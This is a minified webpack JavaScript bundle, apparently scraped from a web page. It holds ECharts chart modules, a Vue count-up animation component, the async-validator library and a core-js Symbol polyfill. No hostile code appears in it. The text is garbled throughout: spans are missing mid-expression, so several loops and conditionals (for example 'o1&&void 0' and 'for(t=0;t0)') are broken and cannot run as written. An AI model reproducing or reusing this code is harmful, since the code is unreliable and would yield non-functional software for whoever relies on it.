h(f),v=[],y=[],_=0,b=0;while(null!=(c=e.next()))y[u]=t.get(a,c),y[1-u]=t.get(s,c),v=n.dataToPoint(y,null,v),g[_]=l?i.x+i.width:v[0],p[_++]=v[0],g[_]=l?v[1]:i.y+i.height,p[_++]=v[1],m[b++]=c;t.setLayout({largePoints:p,largeDataIndices:m,largeBackgroundPoints:g,barWidth:d,valueAxisStart:S(r,o,!1),backgroundStart:l?i.x:i.y,valueAxisHorizontal:l})}}};function w(e){return e.coordinateSystem&&"cartesian2d"===e.coordinateSystem.type}function k(e){return e.pipelineContext&&e.pipelineContext.large}function S(e,t,n){return t.toGlobalCoord(t.dataToCoord("log"===t.type?1:0))}t.getLayoutOnAxis=p,t.prepareLayoutBarSeries=g,t.makeColumnLayout=v,t.retrieveColumnLayout=_,t.layout=b,t.largeLayout=x},"9e2e":function(e,t,n){var i=n("a73c"),r=n("9850"),o=n("82eb"),a=o.WILL_BE_RESTORED,s=new r,l=function(){};l.prototype={constructor:l,drawRectText:function(e,t){var n=this.style;t=n.textRect||t,this.__dirty&&i.normalizeTextStyle(n,!0);var r=n.text;if(null!=r&&(r+=""),i.needDrawText(r,n)){e.save();var o=this.transform;n.transformText?this.setTransform(e):o&&(s.copy(t),s.applyTransform(o),t=s),i.renderText(this,e,r,n,t,a),e.restore()}}};var u=l;e.exports=u},"9e3b":function(e,t,n){!function(t,n){e.exports=n()}(0,(function(){return function(e){function t(i){if(n[i])return n[i].exports;var r=n[i]={i:i,l:!1,exports:{}};return e[i].call(r.exports,r,r.exports,t),r.l=!0,r.exports}var n={};return t.m=e,t.c=n,t.i=function(e){return e},t.d=function(e,n,i){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:i})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="",t(t.s=3)}([function(e,t,n){"use strict";function i(e){return e&&e.__esModule?e:{default:e}}function r(e){return new s.default(e.$el,e.startValue,e.endValue,e.decimals,e.duration,e.options)}Object.defineProperty(t,"__esModule",{value:!0});var o="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},a=n(6),s=i(a),l=n(5),u=i(l),c=n(1),h=n(4),d={useEasing:!0,useGrouping:!0,separator:",",decimal:".",prefix:"",suffix:""},f=[Number,String],p=[String,Array];t.default={props:{tag:{type:String,default:"span"},startValue:{type:f,default:0},endValue:{type:f,default:0},decimals:{type:f,default:0},duration:{type:f,default:2},options:{type:Object,default:function(){return(0,u.default)({},d)}},immediate:{type:Boolean,default:!0},delay:{type:f,default:0},animateClass:{type:p,required:!1},animatedClass:{type:String,default:"animated"}},data:function(){return{oldVal:null,delayTimeout:null}},computed:{computedClass:function(){var e=this.animateClass;return"string"==typeof e&&""!==e?e.includes(" ")?e.split(" "):e:Array.isArray(e)?e:null}},mounted:function(){this.createCountUp(),this.immediate?this.start():this.jumpToEndValue()},methods:{createCountUp:function(){this._countup&&(this._countup.reset(),this._countup=null),this.delayTimeout&&clearTimeout(this.delayTimeout),this._countup=r(this)},jumpToEndValue:function(){this._countup&&this._countup.reset(),this.delayTimeout&&clearTimeout(this.delayTimeout),(this.$el.innerText||this.$el.textContent)&&(this.$el.innerText=this.endValue)},recreateCountUp:function(){this.createCountUp(),this.immediate&&this.start()},start:function(){function e(){n.$el.removeEventListener(h.animationEnd,e)}function t(){n.computedClass&&!(0,c.hasClass)(n.$el,n.computedClass)&&((0,c.hasClass)(n.$el,n.animatedClass)||((0,c.addClass)(n.$el,n.animatedClass),n.$el.offsetWidth),n.$el.addEventListener(h.animationEnd,e,!1),(0,c.addClass)(n.$el,n.computedClass)),n._countup.start((function(t){n.computedClass&&(0,c.hasClass)(n.$el,n.computedClass)&&((0,c.removeClass)(n.$el,n.computedClass),n.$el.removeEventListener(h.animationEnd,e)),n.$emit("callback",n,n._countup)}))}var n=this,i=Math.max(+this.delay,0);i>0?(this.delayTimeout&&clearTimeout(this.delayTimeout),this.delayTimeout=setTimeout(t,1e3*i)):t()},update:function(e){e=Number(e),isNaN(e)?console.error("[vue-countupjs] update() Error! the val is not validate number"):e!==this.oldVal&&(this.oldVal=e,this.computedClass&&!(0,c.hasClass)(this.$el,this.computedClass)&&(0,c.addClass)(this.$el,this.computedClass),this._countup.update(e))},pauseResume:function(){this._countup.pauseResume()},reset:function(){this._countup.reset()}},render:function(e){return e(this.tag,{},"")},watch:{startValue:function(e){e=Number(e),isNaN(e)?console.warn("[vue-countupjs] Warning ! the prop startValue is not number"):this.recreateCountUp()},endValue:function(e){e=Number(e),isNaN(e)?console.error("[vue-countupjs] Error! endValue is not number"):this.recreateCountUp()},decimals:function(e){return e=Number(e),isNaN(e)?void console.error("[vue-countupjs] Error! decimals is not number"):e>20?void console.error("[vue-countupjs] Error! decimals over limit, the max decimals is 20"):void this.recreateCountUp()},duration:function(e){e=Number(e),isNaN(e)?console.error("[vue-countupjs] Error! duration is not number"):this.recreateCountUp()},delay:function(e){e=Number(e),isNaN(e)?console.error("[vue-countupjs] Error! delay is not number"):this.recreateCountUp()},options:{deep:!0,handler:function(e){var t=this._countup;if(e&&"object"===(void 0===e?"undefined":o(e)))for(var n in t.options)e.hasOwnProperty(n)&&null!==e[n]&&(t.options[n]=e[n]);""===t.options.separator&&(t.options.useGrouping=!1)}}}}},function(e,t,n){"use strict";function i(e,t){if(!e||!t)return!1;if(Array.isArray(t))return-1===t.map((function(t){return i(e,t)})).indexOf(!1);if(-1!==t.indexOf(" "))throw new Error("className should not contain space.");return e.classList?e.classList.contains(t):(" "+e.className+" ").indexOf(" "+t+" ")>-1}function r(e,t){if(e){for(var n=e.className,r=Array.isArray(t)?t:(t||"").split(" "),o=0,a=r.length;o1&&void 0!==arguments[1]?arguments[1]:{};if(!i.installed){var n=e.util.extend({},a,t);e.component(n.name,o.default),i.installed=!0}}Object.defineProperty(t,"__esModule",{value:!0}),t.default=i;var r=n(0),o=function(e){return e&&e.__esModule?e:{default:e}}(r),a={name:"v-countup"}},function(e,t,n){"use strict";function i(e){return e&&e.__esModule?e:{default:e}}var r=n(0),o=i(r),a=n(2),s=i(a),l=n(1);o.default.version="1.0.0",o.default.install=s.default,e.exports=o.default,l.inBrowser&&window.Vue&&window.Vue.use(o.default)},function(e,t,n){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.animationEnd=function(){for(var e=document.createElement("div").style,t=["a","webkitA","MozA","OA","msA"],n=["animationend","webkitAnimationEnd","animationend","oAnimationEnd","MSAnimationEnd"],i=0,r=t.length;i1?d.options.decimal+t[1]:"",r=/(\d+)(\d{3})/,d.options.useGrouping)for(;r.test(n);)n=n.replace(r,"$1"+d.options.separator+"$2");return d.options.prefix+n+i+d.options.suffix}function s(e,t,n,i){return n*(1-Math.pow(2,-10*e/i))*1024/1023+t}function l(e){return"number"==typeof e&&!isNaN(e)}for(var u=0,c=["webkit","moz","ms","o"],h=0;hd.endVal,d.frameVal=d.startVal,d.initialized=!0,!0):(console.error("[CountUp] startVal or endVal is not a number",d.startVal,d.endVal),!1)):(console.error("[CountUp] target is null or undefined",d.d),!1))},d.printValue=function(e){var t=d.options.formattingFn(e);"INPUT"===d.d.tagName?this.d.value=t:"text"===d.d.tagName||"tspan"===d.d.tagName?this.d.textContent=t:this.d.innerHTML=t},d.count=function(e){d.startTime||(d.startTime=e),d.timestamp=e;var t=e-d.startTime;d.remaining=d.duration-t,d.options.useEasing?d.countDown?d.frameVal=d.startVal-d.options.easingFn(t,0,d.startVal-d.endVal,d.duration):d.frameVal=d.options.easingFn(t,d.startVal,d.endVal-d.startVal,d.duration):d.countDown?d.frameVal=d.startVal-(d.startVal-d.endVal)*(t/d.duration):d.frameVal=d.startVal+(d.endVal-d.startVal)*(t/d.duration),d.countDown?d.frameVal=d.frameVald.endVal?d.endVal:d.frameVal,d.frameVal=Math.round(d.frameVal*d.dec)/d.dec,d.printValue(d.frameVal),td.endVal,d.rAF=requestAnimationFrame(d.count)):console.error("[CountUp] update() - new endVal is not a number",e))},d.initialize()&&d.printValue(d.startVal)}}))}])}))},"9e47":function(e,t,n){var i=n("6d8b"),r=n("71ad"),o=n("6cb7"),a=n("f934"),s=a.getLayoutParams,l=a.mergeLayoutParam,u=n("8e43"),c=["value","category","time","log"];function h(e,t,n,a){i.each(c,(function(o){t.extend({type:e+"Axis."+o,mergeDefaultAndTheme:function(t,r){var a=this.layoutMode,u=a?s(t):{},c=r.getTheme();i.merge(t,c.get(o+"Axis")),i.merge(t,this.getDefaultOption()),t.type=n(e,t),a&&l(t,u,a)},optionUpdated:function(){var e=this.option;"category"===e.type&&(this.__ordinalMeta=u.createByAxisModel(this))},getCategories:function(e){var t=this.option;if("category"===t.type)return e?t.data:this.__ordinalMeta.categories},getOrdinalMeta:function(){return this.__ordinalMeta},defaultOption:i.mergeAll([{},r[o+"Axis"],a],!0)})})),o.registerSubTypeDefaulter(e+"Axis",i.curry(n,e))}e.exports=h},"9e87":function(e,t,n){var i=n("3eba"),r=n("6d8b"),o=n("50e5");i.registerAction("dataZoom",(function(e,t){var n=o.createLinkedNodesFinder(r.bind(t.eachComponent,t,"dataZoom"),o.eachAxisDim,(function(e,t){return e.get(t.axisIndex)})),i=[];t.eachComponent({mainType:"dataZoom",query:e},(function(e,t){i.push.apply(i,n(e).nodes)})),r.each(i,(function(t,n){t.setRawRange({start:e.start,end:e.end,startValue:e.startValue,endValue:e.endValue})}))}))},"9ed3":function(e,t,n){"use strict";var i=n("ae93").IteratorPrototype,r=n("7c73"),o=n("5c6c"),a=n("d44e"),s=n("3f8c"),l=function(){return this};e.exports=function(e,t,n){var u=t+" Iterator";return e.prototype=r(i,{next:o(1,n)}),a(e,u,!1,!0),s[u]=l,e}},"9f51":function(e,t,n){var i=n("857d"),r=i.normalizeRadian,o=2*Math.PI;function a(e,t,n,i,a,s,l,u,c){if(0===l)return!1;var h=l;u-=e,c-=t;var d=Math.sqrt(u*u+c*c);if(d-h>n||d+ha&&(a+=o);var p=Math.atan2(c,u);return p<0&&(p+=o),p>=i&&p<=a||p+o>=i&&p+o<=a}t.containStroke=a},"9f7f":function(e,t,n){"use strict";var i=n("d039");function r(e,t){return RegExp(e,t)}t.UNSUPPORTED_Y=i((function(){var e=r("a","y");return e.lastIndex=2,null!=e.exec("abcd")})),t.BROKEN_CARET=i((function(){var e=r("^r","gy");return e.lastIndex=2,null!=e.exec("str")}))},"9f82":function(e,t,n){var i=n("ee1a"),r=i.isDimensionStacked,o=n("6d8b"),a=o.map;function s(e,t,n){var i,o=e.getBaseAxis(),s=e.getOtherAxis(o),u=l(s,n),c=o.dim,h=s.dim,d=t.mapDimension(h),f=t.mapDimension(c),p="x"===h||"radius"===h?1:0,g=a(e.dimensions,(function(e){return t.mapDimension(e)})),m=t.getCalculationInfo("stackResultDimension");return(i|=r(t,g[0]))&&(g[0]=m),(i|=r(t,g[1]))&&(g[1]=m),{dataDimsForPoint:g,valueStart:u,valueAxisDim:h,baseAxisDim:c,stacked:!!i,valueDim:d,baseDim:f,baseDataOffset:p,stackedOverDimension:t.getCalculationInfo("stackedOverDimension")}}function l(e,t){var n=0,i=e.scale.getExtent();return"start"===t?n=i[0]:"end"===t?n=i[1]:i[0]>0?n=i[0]:i[1]<0&&(n=i[1]),n}function u(e,t,n,i){var r=NaN;e.stacked&&(r=n.get(n.getCalculationInfo("stackedOverDimension"),i)),isNaN(r)&&(r=e.valueStart);var o=e.baseDataOffset,a=[];return a[o]=n.get(e.baseDim,i),a[1-o]=r,t.dataToPoint(a)}t.prepareDataCoordInfo=s,t.getStackedOnPoint=u},"9fa3":function(e,t,n){var i=n("4ab1"),r=n("6d8b"),o=n("1687");function a(e,t){i.call(this,e,t,"clipPath","__clippath_in_use__")}r.inherits(a,i),a.prototype.update=function(e){var t=this.getSvgElement(e);t&&this.updateDom(t,e.__clipPaths,!1);var n=this.getTextSvgElement(e);n&&this.updateDom(n,e.__clipPaths,!0),this.markUsed(e)},a.prototype.updateDom=function(e,t,n){if(t&&t.length>0){var i,r,a=this.getDefs(!0),s=t[0],l=n?"_textDom":"_dom";s[l]?(r=s[l].getAttribute("id"),i=s[l],a.contains(i)||a.appendChild(i)):(r="zr"+this._zrId+"-clip-"+this.nextId,++this.nextId,i=this.createElement("clipPath"),i.setAttribute("id",r),a.appendChild(i),s[l]=i);var u=this.getSvgProxy(s);if(s.transform&&s.parent.invTransform&&!n){var c=Array.prototype.slice.call(s.transform);o.mul(s.transform,s.parent.invTransform,s.transform),u.brush(s),s.transform=c}else u.brush(s);var h=this.getSvgElement(s);i.innerHTML="",i.appendChild(h.cloneNode()),e.setAttribute("clip-path","url(#"+r+")"),t.length>1&&this.updateDom(i,t.slice(1),n)}else e&&e.setAttribute("clip-path","none")},a.prototype.markUsed=function(e){var t=this;e.__clipPaths&&r.each(e.__clipPaths,(function(e){e._dom&&i.prototype.markUsed.call(t,e._dom),e._textDom&&i.prototype.markUsed.call(t,e._textDom)}))};var s=a;e.exports=s},"9fbb":function(e,t,n){var i=n("4d88");e.exports=Object("z").propertyIsEnumerable(0)?Object:function(e){return"String"==i(e)?e.split(""):Object(e)}},a00a:function(e,t,n){var i=n("313e"),r=n("4ae9");n("5d99"),n("2114"),i.registerCoordinateSystem("bmap",r),i.registerAction({type:"bmapRoam",event:"bmapRoam",update:"updateLayout"},(function(e,t){t.eachComponent("bmap",(function(e){var t=e.getBMap(),n=t.getCenter();e.setCenterAndZoom([n.lng,n.lat],t.getZoom())}))}));var o="1.0.0";t.version=o},a016:function(e,t,n){var i=n("4f85"),r=n("e46b"),o=n("6d8b"),a=n("eda2"),s=a.encodeHTML,l=n("c4a3"),u=i.extend({type:"series.radar",dependencies:["radar"],init:function(e){u.superApply(this,"init",arguments),this.legendVisualProvider=new l(o.bind(this.getData,this),o.bind(this.getRawData,this))},getInitialData:function(e,t){return r(this,{generateCoord:"indicator_",generateCoordCount:1/0})},formatTooltip:function(e,t,n,i){var r=this.getData(),a=this.coordinateSystem,l=a.getIndicatorAxes(),u=this.getData().getName(e),c="html"===i?"
":"\n";return s(""===u?this.name:u)+c+o.map(l,(function(t,n){var i=r.get(r.mapDimension(t.dim),e);return s(t.name+" : "+i)})).join(c)},getTooltipPosition:function(e){if(null!=e)for(var t=this.getData(),n=this.coordinateSystem,i=t.getValues(o.map(n.dimensions,(function(e){return t.mapDimension(e)})),e,!0),r=0,a=i.length;r=o)return e;switch(e){case"%s":return String(t[i++]);case"%d":return Number(t[i++]);case"%j":try{return JSON.stringify(t[i++])}catch(n){return"[Circular]"}break;default:return e}})),l=t[i];i()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/,url:new RegExp("^(?!mailto:)(?:(?:http|https|ftp)://|//)(?:\\S+(?::\\S*)?@)?(?:(?:(?:[1-9]\\d?|1\\d\\d|2[01]\\d|22[0-3])(?:\\.(?:1?\\d{1,2}|2[0-4]\\d|25[0-5])){2}(?:\\.(?:[0-9]\\d?|1\\d\\d|2[0-4]\\d|25[0-4]))|(?:(?:[a-z\\u00a1-\\uffff0-9]+-?)*[a-z\\u00a1-\\uffff0-9]+)(?:\\.(?:[a-z\\u00a1-\\uffff0-9]+-?)*[a-z\\u00a1-\\uffff0-9]+)*(?:\\.(?:[a-z\\u00a1-\\uffff]{2,})))|localhost)(?::\\d{2,5})?(?:(/|\\?|#)[^\\s]*)?$","i"),hex:/^#?([a-f0-9]{6}|[a-f0-9]{3})$/i},k={integer:function(e){return k.number(e)&&parseInt(e,10)===e},float:function(e){return k.number(e)&&!k.integer(e)},array:function(e){return Array.isArray(e)},regexp:function(e){if(e instanceof RegExp)return!0;try{return!!new RegExp(e)}catch(t){return!1}},date:function(e){return"function"===typeof e.getTime&&"function"===typeof e.getMonth&&"function"===typeof e.getYear},number:function(e){return!isNaN(e)&&"number"===typeof e},object:function(e){return"object"===("undefined"===typeof e?"undefined":a()(e))&&!k.array(e)},method:function(e){return"function"===typeof e},email:function(e){return"string"===typeof e&&!!e.match(w.email)&&e.length<255},url:function(e){return"string"===typeof e&&!!e.match(w.url)},hex:function(e){return"string"===typeof e&&!!e.match(w.hex)}};function S(e,t,n,i,r){if(e.required&&void 0===t)_(e,t,n,i,r);else{var o=["integer","float","array","regexp","object","method","email","number","date","url","hex"],s=e.type;o.indexOf(s)>-1?k[s](t)||i.push(u(r.messages.types[s],e.fullField,e.type)):s&&("undefined"===typeof t?"undefined":a()(t))!==e.type&&i.push(u(r.messages.types[s],e.fullField,e.type))}}var M=S;function A(e,t,n,i,r){var o="number"===typeof e.len,a="number"===typeof e.min,s="number"===typeof e.max,l=/[\uD800-\uDBFF][\uDC00-\uDFFF]/g,c=t,h=null,d="number"===typeof t,f="string"===typeof t,p=Array.isArray(t);if(d?h="number":f?h="string":p&&(h="array"),!h)return!1;p&&(c=t.length),f&&(c=t.replace(l,"_").length),o?c!==e.len&&i.push(u(r.messages[h].len,e.fullField,e.len)):a&&!s&&ce.max?i.push(u(r.messages[h].max,e.fullField,e.max)):a&&s&&(ce.max)&&i.push(u(r.messages[h].range,e.fullField,e.min,e.max))}var C=A,T="enum";function I(e,t,n,i,r){e[T]=Array.isArray(e[T])?e[T]:[],-1===e[T].indexOf(t)&&i.push(u(r.messages[T],e.fullField,e[T].join(", ")))}var D=I;function L(e,t,n,i,r){if(e.pattern)if(e.pattern instanceof RegExp)e.pattern.lastIndex=0,e.pattern.test(t)||i.push(u(r.messages.pattern.mismatch,e.fullField,t,e.pattern));else if("string"===typeof e.pattern){var o=new RegExp(e.pattern);o.test(t)||i.push(u(r.messages.pattern.mismatch,e.fullField,t,e.pattern))}}var E=L,O={required:_,whitespace:x,type:M,range:C,enum:D,pattern:E};function P(e,t,n,i,r){var o=[],a=e.required||!e.required&&i.hasOwnProperty(e.field);if(a){if(h(t,"string")&&!e.required)return n();O.required(e,t,i,o,r,"string"),h(t,"string")||(O.type(e,t,i,o,r),O.range(e,t,i,o,r),O.pattern(e,t,i,o,r),!0===e.whitespace&&O.whitespace(e,t,i,o,r))}n(o)}var R=P;function N(e,t,n,i,r){var o=[],a=e.required||!e.required&&i.hasOwnProperty(e.field);if(a){if(h(t)&&!e.required)return n();O.required(e,t,i,o,r),void 0!==t&&O.type(e,t,i,o,r)}n(o)}var z=N;function F(e,t,n,i,r){var o=[],a=e.required||!e.required&&i.hasOwnProperty(e.field);if(a){if(h(t)&&!e.required)return n();O.required(e,t,i,o,r),void 0!==t&&(O.type(e,t,i,o,r),O.range(e,t,i,o,r))}n(o)}var V=F;function B(e,t,n,i,r){var o=[],a=e.required||!e.required&&i.hasOwnProperty(e.field);if(a){if(h(t)&&!e.required)return n();O.required(e,t,i,o,r),void 0!==t&&O.type(e,t,i,o,r)}n(o)}var j=B;function H(e,t,n,i,r){var o=[],a=e.required||!e.required&&i.hasOwnProperty(e.field);if(a){if(h(t)&&!e.required)return n();O.required(e,t,i,o,r),h(t)||O.type(e,t,i,o,r)}n(o)}var q=H;function G(e,t,n,i,r){var o=[],a=e.required||!e.required&&i.hasOwnProperty(e.field);if(a){if(h(t)&&!e.required)return n();O.required(e,t,i,o,r),void 0!==t&&(O.type(e,t,i,o,r),O.range(e,t,i,o,r))}n(o)}var W=G;function $(e,t,n,i,r){var o=[],a=e.required||!e.required&&i.hasOwnProperty(e.field);if(a){if(h(t)&&!e.required)return n();O.required(e,t,i,o,r),void 0!==t&&(O.type(e,t,i,o,r),O.range(e,t,i,o,r))}n(o)}var U=$;function Z(e,t,n,i,r){var o=[],a=e.required||!e.required&&i.hasOwnProperty(e.field);if(a){if(h(t,"array")&&!e.required)return n();O.required(e,t,i,o,r,"array"),h(t,"array")||(O.type(e,t,i,o,r),O.range(e,t,i,o,r))}n(o)}var Y=Z;function X(e,t,n,i,r){var o=[],a=e.required||!e.required&&i.hasOwnProperty(e.field);if(a){if(h(t)&&!e.required)return n();O.required(e,t,i,o,r),void 0!==t&&O.type(e,t,i,o,r)}n(o)}var K=X,J="enum";function Q(e,t,n,i,r){var o=[],a=e.required||!e.required&&i.hasOwnProperty(e.field);if(a){if(h(t)&&!e.required)return n();O.required(e,t,i,o,r),t&&O[J](e,t,i,o,r)}n(o)}var ee=Q;function te(e,t,n,i,r){var o=[],a=e.required||!e.required&&i.hasOwnProperty(e.field);if(a){if(h(t,"string")&&!e.required)return n();O.required(e,t,i,o,r),h(t,"string")||O.pattern(e,t,i,o,r)}n(o)}var ne=te;function ie(e,t,n,i,r){var o=[],a=e.required||!e.required&&i.hasOwnProperty(e.field);if(a){if(h(t)&&!e.required)return n();if(O.required(e,t,i,o,r),!h(t)){var s=void 0;s="number"===typeof t?new Date(t):t,O.type(e,s,i,o,r),s&&O.range(e,s.getTime(),i,o,r)}}n(o)}var re=ie;function oe(e,t,n,i,r){var o=[],s=Array.isArray(t)?"array":"undefined"===typeof t?"undefined":a()(t);O.required(e,t,i,o,r,s),n(o)}var ae=oe;function se(e,t,n,i,r){var o=e.type,a=[],s=e.required||!e.required&&i.hasOwnProperty(e.field);if(s){if(h(t,o)&&!e.required)return n();O.required(e,t,i,a,r,o),h(t,o)||O.type(e,t,i,a,r)}n(a)}var le=se,ue={string:R,method:z,number:V,boolean:j,regexp:q,integer:W,float:U,array:Y,object:K,enum:ee,pattern:ne,date:re,url:le,hex:le,email:le,required:ae};function ce(){return{default:"Validation error on field %s",required:"%s is required",enum:"%s must be one of %s",whitespace:"%s cannot be empty",date:{format:"%s date %s is invalid for format %s",parse:"%s date could not be parsed, %s is invalid ",invalid:"%s date %s is invalid"},types:{string:"%s is not a %s",method:"%s is not a %s (function)",array:"%s is not an %s",object:"%s is not an %s",number:"%s is not a %s",date:"%s is not a %s",boolean:"%s is not a %s",integer:"%s is not an %s",float:"%s is not a %s",regexp:"%s is not a valid %s",email:"%s is not a valid %s",url:"%s is not a valid %s",hex:"%s is not a valid %s"},string:{len:"%s must be exactly %s characters",min:"%s must be at least %s characters",max:"%s cannot be longer than %s characters",range:"%s must be between %s and %s characters"},number:{len:"%s must equal %s",min:"%s cannot be less than %s",max:"%s cannot be greater than %s",range:"%s must be between %s and %s"},array:{len:"%s must be exactly %s in length",min:"%s cannot be less than %s in length",max:"%s cannot be greater than %s in length",range:"%s must be between %s and %s in length"},pattern:{mismatch:"%s value %s does not match pattern %s"},clone:function(){var e=JSON.parse(JSON.stringify(this));return e.clone=this.clone,e}}}var he=ce();function de(e){this.rules=null,this._messages=he,this.define(e)}de.prototype={messages:function(e){return e&&(this._messages=v(ce(),e)),this._messages},define:function(e){if(!e)throw new Error("Cannot configure a schema with no rules");if("object"!==("undefined"===typeof e?"undefined":a()(e))||Array.isArray(e))throw new Error("Rules must be an object");this.rules={};var t=void 0,n=void 0;for(t in e)e.hasOwnProperty(t)&&(n=e[t],this.rules[t]=Array.isArray(n)?n:[n])},validate:function(e){var t=this,n=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},i=arguments[2],o=e,s=n,c=i;if("function"===typeof s&&(c=s,s={}),this.rules&&0!==Object.keys(this.rules).length){if(s.messages){var h=this.messages();h===he&&(h=ce()),v(h,s.messages),s.messages=h}else s.messages=this.messages();var d=void 0,f=void 0,p={},y=s.keys||Object.keys(this.rules);y.forEach((function(n){d=t.rules[n],f=o[n],d.forEach((function(i){var a=i;"function"===typeof a.transform&&(o===e&&(o=r()({},o)),f=o[n]=a.transform(f)),a="function"===typeof a?{validator:a}:r()({},a),a.validator=t.getValidationMethod(a),a.field=n,a.fullField=a.fullField||n,a.type=t.getType(a),a.validator&&(p[n]=p[n]||[],p[n].push({rule:a,value:f,source:o,field:n}))}))}));var _={};g(p,s,(function(e,t){var n=e.rule,i=("object"===n.type||"array"===n.type)&&("object"===a()(n.fields)||"object"===a()(n.defaultField));function o(e,t){return r()({},t,{fullField:n.fullField+"."+e})}function c(){var a=arguments.length>0&&void 0!==arguments[0]?arguments[0]:[],c=a;if(Array.isArray(c)||(c=[c]),c.length&&l("async-validator:",c),c.length&&n.message&&(c=[].concat(n.message)),c=c.map(m(n)),s.first&&c.length)return _[n.field]=1,t(c);if(i){if(n.required&&!e.value)return c=n.message?[].concat(n.message).map(m(n)):s.error?[s.error(n,u(s.messages.required,n.field))]:[],t(c);var h={};if(n.defaultField)for(var d in e.value)e.value.hasOwnProperty(d)&&(h[d]=n.defaultField);for(var f in h=r()({},h,e.rule.fields),h)if(h.hasOwnProperty(f)){var p=Array.isArray(h[f])?h[f]:[h[f]];h[f]=p.map(o.bind(null,f))}var g=new de(h);g.messages(s.messages),e.rule.options&&(e.rule.options.messages=s.messages,e.rule.options.error=s.error),g.validate(e.value,e.rule.options||s,(function(e){t(e&&e.length?c.concat(e):e)}))}else t(c)}i=i&&(n.required||!n.required&&e.value),n.field=e.field;var h=n.validator(n,e.value,c,e.source,s);h&&h.then&&h.then((function(){return c()}),(function(e){return c(e)}))}),(function(e){b(e)}))}else c&&c();function b(e){var t=void 0,n=void 0,i=[],r={};function o(e){Array.isArray(e)?i=i.concat.apply(i,e):i.push(e)}for(t=0;t0){e.moveTo(n[r++],n[r++]);for(var a=1;a0){var h=(s+u)/2-(l-c)*i,d=(l+c)/2-(u-s)*i;e.quadraticCurveTo(h,d,u,c)}else e.lineTo(u,c)}},findDataIndex:function(e,t){var n=this.shape,i=n.segs,r=n.curveness;if(n.polyline)for(var s=0,l=0;l0)for(var c=i[l++],h=i[l++],d=1;d0){var g=(c+f)/2-(h-p)*r,m=(h+p)/2-(f-c)*r;if(a.containStroke(c,h,g,m,f,p))return s}else if(o.containStroke(c,h,f,p))return s;s++}return-1}});function l(){this.group=new i.Group}var u=l.prototype;u.isPersistent=function(){return!this._incremental},u.updateData=function(e){this.group.removeAll();var t=new s({rectHover:!0,cursor:"default"});t.setShape({segs:e.getLayout("linesPoints")}),this._setCommon(t,e),this.group.add(t),this._incremental=null},u.incrementalPrepareUpdate=function(e){this.group.removeAll(),this._clearIncremental(),e.count()>5e5?(this._incremental||(this._incremental=new r({silent:!0})),this.group.add(this._incremental)):this._incremental=null},u.incrementalUpdate=function(e,t){var n=new s;n.setShape({segs:t.getLayout("linesPoints")}),this._setCommon(n,t,!!this._incremental),this._incremental?this._incremental.addDisplayable(n,!0):(n.rectHover=!0,n.cursor="default",n.__startIndex=e.start,this.group.add(n))},u.remove=function(){this._clearIncremental(),this._incremental=null,this.group.removeAll()},u._setCommon=function(e,t,n){var i=t.hostModel;e.setShape({polyline:i.get("polyline"),curveness:i.get("lineStyle.curveness")}),e.useStyle(i.getModel("lineStyle").getLineStyle()),e.style.strokeNoScale=!0;var r=t.getVisual("color");r&&e.setStyle("stroke",r),e.setStyle("fill"),n||(e.seriesIndex=i.seriesIndex,e.on("mousemove",(function(t){e.dataIndex=null;var n=e.findDataIndex(t.offsetX,t.offsetY);n>0&&(e.dataIndex=n+e.__startIndex)})))},u._clearIncremental=function(){var e=this._incremental;e&&e.clearDisplaybles()};var c=l;e.exports=c},a3de:function(e,t,n){"use strict";var i=!("undefined"===typeof window||!window.document||!window.document.createElement),r={canUseDOM:i,canUseWorkers:"undefined"!==typeof Worker,canUseEventListeners:i&&!(!window.addEventListener&&!window.attachEvent),canUseViewport:i&&!!window.screen,isInWorker:!i};e.exports=r},a4b1:function(e,t,n){var i=n("3eba");n("00ba"),n("4d62");var r=n("98e7"),o=n("24b9"),a=n("d3f4");i.registerVisual(r("funnel")),i.registerLayout(o),i.registerProcessor(a("funnel"))},a4d3:function(e,t,n){"use strict";var i=n("23e7"),r=n("da84"),o=n("d066"),a=n("c430"),s=n("83ab"),l=n("4930"),u=n("fdbf"),c=n("d039"),h=n("5135"),d=n("e8b5"),f=n("861d"),p=n("825a"),g=n("7b0b"),m=n("fc6a"),v=n("c04e"),y=n("5c6c"),_=n("7c73"),b=n("df75"),x=n("241c"),w=n("057f"),k=n("7418"),S=n("06cf"),M=n("9bf2"),A=n("d1e7"),C=n("9112"),T=n("6eeb"),I=n("5692"),D=n("f772"),L=n("d012"),E=n("90e3"),O=n("b622"),P=n("e538"),R=n("746f"),N=n("d44e"),z=n("69f3"),F=n("b727").forEach,V=D("hidden"),B="Symbol",j="prototype",H=O("toPrimitive"),q=z.set,G=z.getterFor(B),W=Object[j],$=r.Symbol,U=o("JSON","stringify"),Z=S.f,Y=M.f,X=w.f,K=A.f,J=I("symbols"),Q=I("op-symbols"),ee=I("string-to-symbol-registry"),te=I("symbol-to-string-registry"),ne=I("wks"),ie=r.QObject,re=!ie||!ie[j]||!ie[j].findChild,oe=s&&c((function(){return 7!=_(Y({},"a",{get:function(){return Y(this,"a",{value:7}).a}})).a}))?function(e,t,n){var i=Z(W,t);i&&delete W[t],Y(e,t,n),i&&e!==W&&Y(W,t,i)}:Y,ae=function(e,t){var n=J[e]=_($[j]);return q(n,{type:B,tag:e,description:t}),s||(n.description=t),n},se=u?function(e){return"symbol"==typeof e}:function(e){return Object(e)instanceof $},le=function(e,t,n){e===W&&le(Q,t,n),p(e);var i=v(t,!0);return p(n),h(J,i)?(n.enumerable?(h(e,V)&&e[V][i]&&(e[V][i]=!1),n=_(n,{enumerable:y(0,!1)})):(h(e,V)||Y(e,V,y(1,{})),e[V][i]=!0),oe(e,i,n)):Y(e,i,n)},ue=function(e,t){p(e);var n=m(t),i=b(n).concat(pe(n));return 